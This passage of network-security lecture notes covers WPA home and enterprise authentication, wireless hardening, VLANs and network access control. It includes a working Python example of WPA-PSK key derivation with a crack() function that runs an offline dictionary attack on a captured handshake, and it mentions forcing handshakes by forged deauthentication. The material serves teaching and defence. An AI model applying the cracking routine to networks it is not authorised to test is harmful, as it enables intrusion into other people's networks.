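What "the mobile's password matches the AP's" means on the wire for the home (pre-shared key) case, as an added example that is not from the slides: both sides turn the password and SSID into a pairwise master key with PBKDF2, expand it with the addresses and nonces of this association into the session keys (the "new keys for each new association" of the slide), and the station proves it holds the password by putting a keyed MIC on its handshake message. The flip side is that everything the attacker needs to replay that derivation is in the clear, so a captured handshake allows an offline dict attack on the password. PBKDF2 (4096 rounds, 256-bit PMK) and the PRF-512 expansion are as specified in IEEE 802.11i; the EAPOL message layout is a simplified constructed stand-in, the MIC is HMAC-SHA1 truncated to 16 bytes (the AES/CCMP key descriptor), and the addresses, nonces and passwords are constructed.

```python
"""WPA-PSK key derivation and the offline dictionary attack (added example, constructed data)."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """Pairwise master key: the password never goes on the air, both sides derive this."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk, aa, spa, anonce, snonce):
    """PRF-512 pairwise key expansion from the PMK, both addresses and both nonces.
    Bytes 0..15 are the KCK, the key that authenticates the handshake messages."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def eapol_mic(kck, eapol_with_zeroed_mic):
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


# Constructed association between a station and an access point.
AA = bytes.fromhex("00aabbccdd01")        # access point (authenticator) address
SPA = bytes.fromhex("001122334455")       # station (supplicant) address
SSID = "OFFICE"
ANONCE = bytes(range(32))                 # in reality both nonces are random
SNONCE = bytes(range(32, 64))


def four_way_message2(passphrase):
    """What the station sends as message 2: its nonce plus a MIC keyed by the KCK.
    The MIC field is zero while the MIC is computed (simplified constructed layout)."""
    kck = ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    frame = b"\x02\x03\x00\x5f" + b"\x02\x01\x0a" + bytes(8) + SNONCE + bytes(16)
    return frame, eapol_mic(kck, frame)


def crack(captured_frame, captured_mic, wordlist):
    """Attacker: redo the derivation for each guess until the MIC matches. The SSID,
    both addresses, both nonces and message 2 were all captured in the clear."""
    for guess in wordlist:
        kck = ptk(pmk_from_passphrase(guess, SSID), AA, SPA, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, captured_frame), captured_mic):
            return guess
    return None
```

The 4096 PBKDF2 rounds are the only thing slowing the attacker down, and a forged deauthentication (see the header-based DoS above) makes a station redo the handshake on demand, so the capture is easy to obtain. The defence for the home case is passphrase length and randomness; the enterprise case on the next slide removes the shared password altogether, since the master key comes from the authentication server per user.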

Enterprise WPA

[Figure: as in the home case, Device A and Device B associate with the enterprise network and negotiate session keys A and B, but the password presented by each device is checked by the enterprise user authentication system (password verification) rather than by the access point, which only relays the exchange.]

Wireless (A world without perimeters)

  • Wireless can create a new perimeter

– Known access points
– Unknown access points

  • Treat your wireless access points the same as you would any remote access to your network.

– Monitor it
– Filter it
– Protect it

Why is Wireless different?

  • Most security models are based on a strong perimeter around an organization
  • Wireless signals are not confined to the walls of an organization
  • Wireless technology is plug and play
  • Security makes wireless harder to use.

How to secure your wireless network

  • Control your broadcast area
  • Enable WEP, use WPA if possible (WEP can be cracked from captured traffic, as noted above, so treat a WEP network as an open one)
  • Disable SSID Broadcast

– More work to setup clients
– Hides the network only from casual discovery; the SSID still appears in probe and association frames

  • Change default AP settings
  • Don't choose descriptive SSID
  • Restrict associations to MAC addresses (a weak control on its own, since the hardware address can be set by the attacker)

General Mitigation Methods

  • VLAN
  • NAC

VLAN

  • Virtual Local Area Network

– Creates virtual networks where traffic is isolated between each VLAN based on the hardware address

  • Two types

– Static: each port on the switch is part of a VLAN
– Dynamic: VLAN assignment is based on hardware address

VLAN

[Figure: a router connected to Switches 1, 2 and 3 with devices D1-D7; each switch port is assigned to VLAN 1 or VLAN 2, so members of both VLANs share the same physical switches.]

Logical View of VLAN

[Figure: the same network drawn logically. VLAN 1 contains D1, D4 and D7 on one virtual switch; VLAN 2 contains D2, D3, D5 and D6 on another; the router joins the two VLANs.]

VLAN Security

  • A VLAN will separate traffic, but will not protect devices inside a network from other devices in the same network
  • Dynamic VLAN can be fooled by changing the MAC address
  • Can help in wireless security

Wireless VLAN

[Figure: the wireless access points are placed in their own wireless VLAN on the switch, behind a router / perimeter defense of their own, so a wireless attacker is kept outside the wired network just as an Internet attacker is kept outside by the main router / perimeter defense.]

Network Access Control

  • Only allow trusted devices on the network
  • A host has software that performs an assessment of the host (virus software, etc.)
  • Host asks policy server if it can use the network
  • Network will enforce the policy (limited or full access)

NAC Framework

[Figure: the switch and the router / perimeter defense act as policy enforcement points for the wired network, the wireless VLAN and the Internet connection; a policy decision point, backed by the authentication system, tells them whether each host gets limited or full access.]

NAC

  • Limited use today
  • Focuses on misconfigured or infected devices

Physical Network Security

  • Protection methods are limited to local network
  • Provides limited security